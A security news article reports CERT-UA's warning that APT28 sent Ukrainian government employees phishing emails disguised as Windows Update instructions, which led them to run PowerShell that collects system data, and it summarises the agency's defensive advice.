The Russian hacker group APT28 (aka Fancy Bear, Sednit, and Sofacy) is targeting Ukrainian government agencies via a new phishing campaign. The Kremlin-backed APT group is now using phony Windows Update messages, attempting to exfiltrate system data.
Active since 2008, APT28 gained notoriety for actively targeting Ukrainian government agencies since the beginning of the Russia-Ukraine conflict.
CERT-UA warning
CERT-UA issued a warning on the latest attack campaign that uses fake Windows Update emails to lure its victims.
- The attack begins with phishing emails sent to employees in government bodies, masquerading as system administrators of their departments.
- The email addresses are created using outlook[.]com public email service; it uses the real surname and initials of the employees.
- The emails carry the subject line Windows Updates and urge the readers to follow the provided instructions to update their system immediately.
The email instructions
The email warns the readers to update their systems to protect against cyberattacks, by running the provided PowerShell commands via command prompt.
- The mail carries instructions and images to launch the command prompt, followed by the execution of PowerShell commands.
- Running the command downloads a PowerShell script, designed to masquerade as a system/OS update procedure while collecting information about the system in the background via commands such as systeminfo and tasklist.
- The collected information is sent to the attackers using Mocky service API via HTTP requests.
Safety tips
CERT-UA suggests organizations monitor the network connections to the Mocky server and restrict the roles of users that are allowed to run PowerShell code. The security agency further advises staying alert against phishing and spear-phishing emails, which are increasingly used by attackers to penetrate networks.
Publisher
/https://cyware-ent.s3.amazonaws.com/image_bank/1d89_shutterstock_2248618607.jpg)
/https://cyware-ent.s3.amazonaws.com/image_bank/iStock_000082450405_Medium.jpg)
